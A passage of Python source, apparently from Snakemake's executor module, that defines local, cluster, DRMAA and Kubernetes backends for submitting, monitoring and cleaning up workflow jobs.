keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.exec_job = "\\\n".join(
(
"cd {workflow.workdir_init} && ",
"{sys.executable} -m snakemake {target} --snakefile {snakefile} ",
"--force -j{cores} --keep-target-files --keep-remote ",
"--attempt {attempt} --scheduler {workflow.scheduler_type} ",
"--force-use-threads --wrapper-prefix {workflow.wrapper_prefix} ",
"--max-inventory-time 0 --ignore-incomplete ",
"--latency-wait {latency_wait} ",
self.get_default_remote_provider_args(),
self.get_default_resources_args(),
self.get_behavior_args(),
self.get_set_scatter_args(),
self.get_set_threads_args(),
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ",
"--notemp --quiet --no-hooks --nolock --mode {} ".format(
Mode.subprocess
),
)
)
self.exec_job += self.get_additional_args()
self.use_threads = use_threads
self.cores = cores
# Zero thread jobs do not need a thread, but they occupy additional workers.
# Hence we need to reserve additional workers for them.
self.workers = workers + 5
self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.workers)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
if job.is_group():
# if we still don't have enough workers for this group, create a new pool here
missing_workers = max(len(job) - self.workers, 0)
if missing_workers:
self.workers += missing_workers
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=self.workers
)
# the future waits for the entire group job
future = self.pool.submit(self.run_group_job, job)
else:
future = self.run_single_job(job)
future.add_done_callback(partial(self._callback, job, callback, error_callback))
def job_args_and_prepare(self, job):
job.prepare()
conda_env = job.conda_env_path if self.workflow.use_conda else None
container_img = (
job.container_img_path if self.workflow.use_singularity else None
)
env_modules = job.env_modules if self.workflow.use_env_modules else None
benchmark = None
benchmark_repeats = job.benchmark_repeats or 1
if job.benchmark is not None:
benchmark = str(job.benchmark)
return (
job.rule,
job.input._plainstrings(),
job.output._plainstrings(),
job.params,
job.wildcards,
job.threads,
job.resources,
job.log._plainstrings(),
benchmark,
benchmark_repeats,
conda_env,
container_img,
self.workflow.singularity_args,
env_modules,
self.workflow.use_singularity,
self.workflow.linemaps,
self.workflow.debug,
self.workflow.cleanup_scripts,
job.shadow_dir,
job.jobid,
self.workflow.edit_notebook,
job.rule.basedir,
)
def run_single_job(self, job):
if self.use_threads or (not job.is_shadow and not job.is_run):
future = self.pool.submit(
self.cached_or_run, job, run_wrapper, *self.job_args_and_prepare(job)
)
else:
# run directive jobs are spawned into subprocesses
future = self.pool.submit(self.cached_or_run, job, self.spawn_job, job)
return future
def run_group_job(self, job):
"""Run a pipe group job.
This lets all items run simultaneously."""
# we only have to consider pipe groups because in local running mode,
# these are the only groups that will occur
futures = [self.run_single_job(j) for j in job]
while True:
k = 0
for f in futures:
if f.done():
ex = f.exception()
if ex is not None:
# kill all shell commands of the other group jobs
# there can be only shell commands because the
# run directive is not allowed for pipe jobs
for j in job:
shell.kill(j.jobid)
raise ex
else:
k += 1
if k == len(futures):
return
time.sleep(1)
def spawn_job(self, job):
exec_job = self.exec_job
cmd = self.format_job_pattern(
exec_job, job=job, _quote_all=True, latency_wait=self.latency_wait
)
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
raise SpawnedJobError()
def cached_or_run(self, job, run_func, *args):
"""
Either retrieve result from cache, or run job with given function.
"""
to_cache = self.workflow.is_cached_rule(job.rule)
try:
if to_cache:
self.workflow.output_file_cache.fetch(job)
return
except CacheMissException:
pass
run_func(*args)
if to_cache:
self.workflow.output_file_cache.store(job)
def shutdown(self):
self.pool.shutdown()
def cancel(self):
self.pool.shutdown()
def _callback(self, job, callback, error_callback, future):
try:
ex = future.exception()
if ex is not None:
raise ex
callback(job)
except _ProcessPoolExceptions:
self.handle_job_error(job)
# no error callback, just silently ignore the interrupt as the main scheduler is also killed
except SpawnedJobError:
# don't print error message, this is done by the spawned subprocess
error_callback(job)
except (Exception, BaseException) as ex:
self.print_job_error(job)
if not (job.is_group() or job.shellcmd) or self.workflow.verbose:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job)
def handle_job_error(self, job):
super().handle_job_error(job)
if not self.keepincomplete:
job.cleanup()
self.workflow.persistence.cleanup(job)
class ClusterExecutor(RealExecutor):
"""Backend for distributed execution.
The key idea is that a job is converted into a script that invokes Snakemake again, in whatever environment is targeted. The script is submitted to some job management platform (e.g. a cluster scheduler like slurm).
This class can be specialized to generate more specific backends, also for the cloud.
"""
default_jobscript = "jobscript.sh"
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{name}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
exec_job=None,
assume_shared_fs=True,
max_status_checks_per_second=1,
disable_default_remote_provider_args=False,
disable_get_default_resources_args=False,
keepincomplete=False,
keepmetadata=True,
):
from ratelimiter import RateLimiter
local_input = local_input or []
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
assume_shared_fs=assume_shared_fs,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
if not self.assume_shared_fs:
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
jobscript = workflow.jobscript
if jobscript is None:
jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript)
try:
with open(jobscript) as f:
self.jobscript = f.read()
except IOError as e:
raise WorkflowError(e)
if not "jobid" in get_wildcard_names(jobname):
raise WorkflowError(
'Defined jobname ("{}") has to contain the wildcard {jobid}.'
)
if exec_job is None:
self.exec_job = "\\\n".join(
(
"{envvars} " "cd {workflow.workdir_init} && "
if assume_shared_fs
else "",
"{path:u} {sys.executable} " if assume_shared_fs else "python ",
"-m snakemake {target} --snakefile {snakefile} ",
"--force -j{cores} --keep-target-files --keep-remote --max-inventory-time 0 ",
"--wait-for-files {wait_for_files} --latency-wait {latency_wait} ",
" --attempt {attempt} {use_threads} --scheduler {workflow.scheduler_type} ",
"--wrapper-prefix {workflow.wrapper_prefix} ",
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} "
"--nocolor --notemp --no-hooks --nolock ",
"--mode {} ".format(Mode.cluster),
)
)
else:
self.exec_job = exec_job
self.exec_job += self.get_additional_args()
if not disable_default_remote_provider_args:
self.exec_job += self.get_default_remote_provider_args()
if not disable_get_default_resources_args:
self.exec_job += self.get_default_resources_args()
self.exec_job += self.get_behavior_args()
self.exec_job += self.get_set_scatter_args()
self.exec_job += self.get_set_threads_args()
self.jobname = jobname
self._tmpdir = None
self.cores = cores if cores else ""
self.cluster_config = cluster_config if cluster_config else dict()
self.restart_times = restart_times
self.active_jobs = list()
self.lock = threading.Lock()
self.wait = True
self.wait_thread = threading.Thread(target=self._wait_for_jobs)
self.wait_thread.daemon = True
self.wait_thread.start()
self.max_status_checks_per_second = max_status_checks_per_second
self.status_rate_limiter = RateLimiter(
max_calls=self.max_status_checks_per_second, period=1
)
def shutdown(self):
with self.lock:
self.wait = False
self.wait_thread.join()
if not self.workflow.immediate_submit:
# Only delete tmpdir (containing jobscripts) if not using
# immediate_submit. With immediate_submit, jobs can be scheduled
# after this method is completed. Hence we have to keep the
# directory.
shutil.rmtree(self.tmpdir)
def cancel(self):
self.shutdown()
def _run(self, job, callback=None, error_callback=None):
if self.assume_shared_fs:
job.remove_existing_output()
job.download_remote_input()
super()._run(job, callback=callback, error_callback=error_callback)
@property
def tmpdir(self):
if self._tmpdir is None:
self._tmpdir = tempfile.mkdtemp(dir=".snakemake", prefix="tmp.")
return os.path.abspath(self._tmpdir)
def get_jobscript(self, job):
f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job))
if os.path.sep in f:
raise WorkflowError(
"Path separator ({}) found in job name {}. "
"This is not supported.".format(os.path.sep, f)
)
return os.path.join(self.tmpdir, f)
def format_job(self, pattern, job, **kwargs):
wait_for_files = []
path = ""
if self.assume_shared_fs:
wait_for_files.append(self.tmpdir)
wait_for_files.extend(job.get_wait_for_files())
# Prepend PATH of current python executable to PATH.
# This way, we ensure that the snakemake process in the cluster node runs
# in the same environment as the current process.
# This is necessary in order to find the pulp solver backends (e.g. coincbc).
path = "PATH='{}':$PATH".format(os.path.dirname(sys.executable))
format_p = partial(
self.format_job_pattern,
job=job,
properties=job.properties(cluster=self.cluster_params(job)),
latency_wait=self.latency_wait,
wait_for_files=wait_for_files,
path=path,
**kwargs,
)
try:
return format_p(pattern)
except KeyError as e:
raise WorkflowError(
"Error formatting jobscript: {} not found\n"
"Make sure that your custom jobscript is up to date.".format(e)
)
def write_jobscript(self, job, jobscript, **kwargs):
# only force threads if this is not a group job
# otherwise we want proper process handling
use_threads = "--force-use-threads" if not job.is_group() else ""
envvars = " ".join(
"{}={}".format(var, os.environ[var]) for var in self.workflow.envvars
)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads=use_threads,
envvars=envvars,
**kwargs,
)
content = self.format_job(self.jobscript, job, exec_job=exec_job, **kwargs)
logger.debug("Jobscript:\n{}".format(content))
with open(jobscript, "w") as f:
print(content, file=f)
os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR | stat.S_IRUSR)
def cluster_params(self, job):
"""Return wildcards object for job from cluster_config."""
cluster = self.cluster_config.get("__default__", dict()).copy()
cluster.update(self.cluster_config.get(job.name, dict()))
# Format values with available parameters from the job.
for key, value in list(cluster.items()):
if isinstance(value, str):
try:
cluster[key] = job.format_wildcards(value)
except NameError as e:
if job.is_group():
msg = (
"Failed to format cluster config for group job. "
"You have to ensure that your default entry "
"does not contain any items that group jobs "
"cannot provide, like {rule}, {wildcards}."
)
else:
msg = (
"Failed to format cluster config "
"entry for job {}.".format(job.rule.name)
)
raise WorkflowError(msg, e)
return cluster
def cluster_wildcards(self, job):
return Wildcards(fromdict=self.cluster_params(job))
def handle_job_success(self, job):
super().handle_job_success(
job, upload_remote=False, handle_log=False, handle_touch=False
)
def handle_job_error(self, job):
# TODO what about removing empty remote dirs?? This cannot be decided
# on the cluster node.
super().handle_job_error(job, upload_remote=False)
logger.debug("Cleanup job metadata.")
# We have to remove metadata here as well.
# It will be removed by the CPUExecutor in case of a shared FS,
# but we might not see the removal due to filesystem latency.
# By removing it again, we make sure that it is gone on the host FS.
if not self.keepincomplete:
self.workflow.persistence.cleanup(job)
# Also cleanup the jobs output files, in case the remote job
# was not able to, due to e.g. timeout.
logger.debug("Cleanup failed jobs output files.")
job.cleanup()
def print_cluster_job_error(self, job_info, jobid):
job = job_info.job
kind = (
"rule {}".format(job.rule.name)
if not job.is_group()
else "group job {}".format(job.groupid)
)
logger.error(
"Error executing {} on cluster (jobid: {}, external: "
"{}, jobscript: {}). For error details see the cluster "
"log and the log files of the involved rule(s).".format(
kind, jobid, job_info.jobid, job_info.jobscript
)
)
GenericClusterJob = namedtuple(
"GenericClusterJob",
"job jobid callback error_callback jobscript jobfinished jobfailed",
)
class GenericClusterExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
statuscmd=None,
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.submitcmd = submitcmd
if not assume_shared_fs and statuscmd is None:
raise WorkflowError(
"When no shared filesystem can be assumed, a "
"status command must be given."
)
self.statuscmd = statuscmd
self.external_jobid = dict()
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
if statuscmd:
self.exec_job += " && exit 0 || exit 1"
elif assume_shared_fs:
# TODO wrap with watch and touch {jobrunning}
# check modification date of {jobrunning} in the wait_for_job method
self.exec_job += " && touch {jobfinished} || (touch {jobfailed}; exit 1)"
else:
raise WorkflowError(
"If no shared filesystem is used, you have to "
"specify a cluster status command."
)
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def register_job(self, job):
# Do not register job here.
# Instead do it manually once the jobid is known.
pass
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
jobfinished = os.path.join(self.tmpdir, "{}.jobfinished".format(jobid))
jobfailed = os.path.join(self.tmpdir, "{}.jobfailed".format(jobid))
self.write_jobscript(
job, jobscript, jobfinished=jobfinished, jobfailed=jobfailed
)
if self.statuscmd:
ext_jobid = self.dag.incomplete_external_jobid(job)
if ext_jobid:
# Job is incomplete and still running.
# We simply register it and wait for completion or failure.
logger.info(
"Resuming incomplete job {} with external jobid '{}'.".format(
jobid, ext_jobid
)
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
return
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
try:
ext_jobid = (
subprocess.check_output(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
.decode()
.split("\n")
)
except subprocess.CalledProcessError as ex:
logger.error(
"Error submitting jobscript (exit code {}):\n{}".format(
ex.returncode, ex.output.decode()
)
)
error_callback(job)
return
if ext_jobid and ext_jobid[0]:
ext_jobid = ext_jobid[0]
self.external_jobid.update((f, ext_jobid) for f in job.output)
logger.info(
"Submitted {} {} with external jobid '{}'.".format(
"group job" if job.is_group() else "job", jobid, ext_jobid
)
)
self.workflow.persistence.started(job, external_jobid=ext_jobid)
submit_callback(job)
with self.lock:
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
def _wait_for_jobs(self):
success = "success"
failed = "failed"
running = "running"
if self.statuscmd is not None:
def job_status(job):
try:
# this command shall return "success", "failed" or "running"
return (
subprocess.check_output(
"{statuscmd} {jobid}".format(
jobid=job.jobid, statuscmd=self.statuscmd
),
shell=True,
)
.decode()
.split("\n")[0]
)
except subprocess.CalledProcessError as e:
if e.returncode < 0:
# Ignore SIGINT and all other issues due to signals
# because it will be caused by hitting e.g.
# Ctrl-C on the main process or sending killall to
# snakemake.
# Snakemake will handle the signal in
# the main process.
pass
else:
raise WorkflowError(
"Failed to obtain job status. "
"See above for error message."
)
else:
def job_status(job):
if os.path.exists(active_job.jobfinished):
os.remove(active_job.jobfinished)
os.remove(active_job.jobscript)
return success
if os.path.exists(active_job.jobfailed):
os.remove(active_job.jobfailed)
os.remove(active_job.jobscript)
return failed
return running
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
# logger.debug("Checking status of {} jobs.".format(len(active_jobs)))
for active_job in active_jobs:
with self.status_rate_limiter:
status = job_status(active_job)
if status == success:
active_job.callback(active_job.job)
elif status == failed:
self.print_job_error(
active_job.job,
cluster_jobid=active_job.jobid
if active_job.jobid
else "unknown",
)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
still_running.append(active_job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
SynchronousClusterJob = namedtuple(
"SynchronousClusterJob", "job jobid callback error_callback jobscript process"
)
class SynchronousClusterExecutor(ClusterExecutor):
"""
invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are
synchronous, blocking the foreground thread and returning the
remote exit code at remote exit.
"""
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=10,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.submitcmd = submitcmd
self.external_jobid = dict()
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
process = subprocess.Popen(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
SynchronousClusterJob(
job, process.pid, callback, error_callback, jobscript, process
)
)
def _wait_for_jobs(self):
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
exitcode = active_job.process.poll()
if exitcode is None:
# job not yet finished
still_running.append(active_job)
elif exitcode == 0:
# job finished successfully
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
else:
# job failed
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
DRMAAClusterJob = namedtuple(
"DRMAAClusterJob", "job jobid callback error_callback jobscript"
)
class DRMAAExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
drmaa_args="",
drmaa_log_dir=None,
latency_wait=3,
cluster_config=None,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
try:
import drmaa
except ImportError:
raise WorkflowError(
"Python support for DRMAA is not installed. "
"Please install it, e.g. with easy_install3 --user drmaa"
)
except RuntimeError as e:
raise WorkflowError("Error loading drmaa support:\n{}".format(e))
self.session = drmaa.Session()
self.drmaa_args = drmaa_args
self.drmaa_log_dir = drmaa_log_dir
self.session.initialize()
self.submitted = list()
def cancel(self):
from drmaa.const import JobControlAction
from drmaa.errors import InvalidJobException, InternalException
for jobid in self.submitted:
try:
self.session.control(jobid, JobControlAction.TERMINATE)
except (InvalidJobException, InternalException):
# This is common - logging a warning would probably confuse the user.
pass
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
try:
drmaa_args = job.format_wildcards(
self.drmaa_args, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule)
import drmaa
if self.drmaa_log_dir:
makedirs(self.drmaa_log_dir)
try:
jt = self.session.createJobTemplate()
jt.remoteCommand = jobscript
jt.nativeSpecification = drmaa_args
if self.drmaa_log_dir:
jt.outputPath = ":" + self.drmaa_log_dir
jt.errorPath = ":" + self.drmaa_log_dir
jt.jobName = os.path.basename(jobscript)
jobid = self.session.runJob(jt)
except (
drmaa.DeniedByDrmException,
drmaa.InternalException,
drmaa.InvalidAttributeValueException,
) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps
)
error_callback(job)
return
logger.info(
"Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)
)
self.submitted.append(jobid)
self.session.deleteJobTemplate(jt)
submit_callback(job)
with self.lock:
self.active_jobs.append(
DRMAAClusterJob(job, jobid, callback, error_callback, jobscript)
)
def shutdown(self):
super().shutdown()
self.session.exit()
def _wait_for_jobs(self):
import drmaa
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
try:
retval = self.session.wait(
active_job.jobid, drmaa.Session.TIMEOUT_NO_WAIT
)
except drmaa.ExitTimeoutException as e:
# job still active
still_running.append(active_job)
continue
except (drmaa.InternalException, Exception) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)),
self.workflow.linemaps,
)
os.remove(active_job.jobscript)
active_job.error_callback(active_job.job)
continue
# job exited
os.remove(active_job.jobscript)
if (
not retval.wasAborted
and retval.hasExited
and retval.exitStatus == 0
):
active_job.callback(active_job.job)
else:
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
@contextlib.contextmanager
def change_working_directory(directory=None):
"""Change working directory in execution context if provided."""
if directory:
try:
saved_directory = os.getcwd()
logger.info("Changing to shadow directory: {}".format(directory))
os.chdir(directory)
yield
finally:
os.chdir(saved_directory)
else:
yield
KubernetesJob = namedtuple(
"KubernetesJob", "job jobid callback error_callback kubejob jobscript"
)
class KubernetesExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
namespace,
container_image=None,
jobname="{rulename}.{jobid}",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
exec_job = (
"cp -rf /source/. . && "
"snakemake {target} --snakefile {snakefile} "
"--force -j{cores} --keep-target-files --keep-remote "
"--latency-wait {latency_wait} --scheduler {workflow.scheduler_type} "
" --attempt {attempt} {use_threads} --max-inventory-time 0 "
"--wrapper-prefix {workflow.wrapper_prefix} "
"{overwrite_config} {printshellcmds} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
None,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=10,
)
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
try:
from kubernetes import config
except ImportError:
raise WorkflowError(
"The Python 3 package 'kubernetes' "
"must be installed to use Kubernetes"
)
config.load_kube_config()
import kubernetes.client
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.namespace = namespace
self.envvars = workflow.envvars
self.secret_files = {}
self.run_namespace = str(uuid.uuid4())
self.secret_envvars = {}
self.register_secret()
self.container_image = container_image or get_container_image()
def register_secret(self):
import kubernetes.client
secret = kubernetes.client.V1Secret()
secret.metadata = kubernetes.client.V1ObjectMeta()
# create a random uuid
secret.metadata.name = self.run_namespace
secret.type = "Opaque"
secret.data = {}
for i, f in enumerate(self.workflow.get_sources()):
if f.startswith(".."):
logger.warning(
"Ignoring source file {}. Only files relative "
"to the working directory are allowed.".format(f)
)
continue
# The kubernetes API can't create secret files larger than 1MB.
source_file_size = os.path.getsize(f)
max_file_size = 1048576
if source_file_size > max_file_size:
logger.warning(
"Skipping the source file {f}. Its size {source_file_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f, source_file_size=source_file_size
)
)
continue
with open(f, "br") as content:
key = "f{}".format(i)
# Some files are smaller than 1MB, but grows larger after being base64 encoded
# We should exclude them as well, otherwise Kubernetes APIs will complain
encoded_contents = base64.b64encode(content.read()).decode()
encoded_size = len(encoded_contents)
if encoded_size > 1048576:
logger.warning(
"Skipping the source file {f} for secret key {key}. "
"Its base64 encoded size {encoded_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f,
source_file_size=source_file_size,
key=key,
encoded_size=encoded_size,
)
)
continue
self.secret_files[key] = f
secret.data[key] = encoded_contents
for e in self.envvars:
try:
key = e.lower()
secret.data[key] = base64.b64encode(os.environ[e].encode()).decode()
self.secret_envvars[key] = e
except KeyError:
continue
# Test if the total size of the configMap exceeds 1MB
config_map_size = sum(
[len(base64.b64decode(v)) for k, v in secret.data.items()]
)
if config_map_size > 1048576:
logger.warning(
"The total size of the included files and other Kubernetes secrets "
"is {}, exceeding the 1MB limit.\n".format(config_map_size)
)
logger.warning(
"The following are the largest files. Consider removing some of them "
"(you need remove at least {} bytes):".format(config_map_size - 1048576)
)
entry_sizes = {
self.secret_files[k]: len(base64.b64decode(v))
for k, v in secret.data.items()
if k in self.secret_files
}
for k, v in sorted(entry_sizes.items(), key=lambda item: item[1])[:-6:-1]:
logger.warning(" * File: {k}, original size: {v}".format(k=k, v=v))
raise WorkflowError("ConfigMap too large")
self.kubeapi.create_namespaced_secret(self.namespace, secret)
def unregister_secret(self):
import kubernetes.client
safe_delete_secret = lambda: self.kubeapi.delete_namespaced_secret(
self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()
)
self._kubernetes_retry(safe_delete_secret)
# In rare cases, deleting a pod may rais 404 NotFound error.
def safe_delete_pod(self, jobid, ignore_not_found=True):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
try:
self.kubeapi.delete_namespaced_pod(jobid, self.namespace, body=body)
except kubernetes.client.rest.ApiException as e:
if e.status == 404 and ignore_not_found:
# Can't find the pod. Maybe it's already been
# destroyed. Proceed with a warning message.
logger.warning(
"[WARNING] 404 not found when trying to delete the pod: {jobid}\n"
"[WARNING] Ignore this error\n".format(jobid=jobid)
)
else:
raise e
def shutdown(self):
self.unregister_secret()
super().shutdown()
def cancel(self):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
with self.lock:
for j in self.active_jobs:
func = lambda: self.safe_delete_pod(j.jobid, ignore_not_found=True)
self._kubernetes_retry(func)
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
import kubernetes.client
super()._run(job)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads="--force-use-threads" if not job.is_group() else "",
)
# Kubernetes silently does not submit a job if the name is too long
# therefore, we ensure that it is not longer than snakejob+uuid.
jobid = "snakejob-{}".format(
get_uuid("{}-{}-{}".format(self.run_namespace, job.jobid, job.attempt))
)
body = kubernetes.client.V1Pod()
body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"})
body.metadata.name = jobid
# container
container = kubernetes.client.V1Container(name=jobid)
container.image = self.container_image
container.command = shlex.split("/bin/sh")
container.args = ["-c", exec_job]
container.working_dir = "/workdir"
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="workdir", mount_path="/workdir")
]
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="source", mount_path="/source")
]
body.spec = kubernetes.client.V1PodSpec(containers=[container])
# fail on first error
body.spec.restart_policy = "Never"
# source files as a secret volume
# we copy these files to the workdir before executing Snakemake
too_large = [
path
for path in self.secret_files.values()
if os.path.getsize(path) > 1000000
]
if too_large:
raise WorkflowError(
"The following source files exceed the maximum "
"file size (1MB) that can be passed from host to "
"kubernetes. These are likely not source code "
"files. Consider adding them to your "
"remote storage instead or (if software) use "
"Conda packages or container images:\n{}".format("\n".join(too_large))
)
secret_volume = kubernetes.client.V1Volume(name="source")
secret_volume.secret = kubernetes.client.V1SecretVolumeSource()
secret_volume.secret.secret_name = self.run_namespace
secret_volume.secret.items = [
kubernetes.client.V1KeyToPath(key=key, path=path)
for key, path in self.secret_files.items()
]
# workdir as an emptyDir volume of undefined size
workdir_volume = kubernetes.client.V1Volume(name="workdir")
workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource()
body.spec.volumes = [secret_volume, workdir_volume]
# env vars
container.env = []
for key, e in self.secret_envvars.items():
envvar = kubernetes.client.V1EnvVar(name=e)
envvar.value_from = kubernetes.client.V1EnvVarSource()
envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector(
key=key, name=self.run_namespace
)
container.env.append(envvar)
# request resources
container.resources = kubernetes.client.V1ResourceRequirements()
container.resources.requests = {}
container.resources.requests["cpu"] = job.resources["_cores"]
if "mem_mb" in job.resources.keys():
container.resources.requests["memory"] = "{}M".format(
job.resources["mem_mb"]
)
# capabilities
if job.needs_singularity and self.workflow.use_singularity:
# TODO this should work, but it doesn't currently because of
# missing loop devices
# singularity inside docker requires SYS_ADMIN capabilities
# see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc
# container.capabilities = kubernetes.client.V1Capabilities()
# container.capabilities.add = ["SYS_ADMIN",
# "DAC_OVERRIDE",
# "SETUID",
# "SETGID",
# "SYS_CHROOT"]
# Running in priviledged mode always works
container.security_context = kubernetes.client.V1SecurityContext(
privileged=True
)
pod = self._kubernetes_retry(
lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)
)
logger.info(
"Get status with:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}".format(jobid=jobid)
)
self.active_jobs.append(
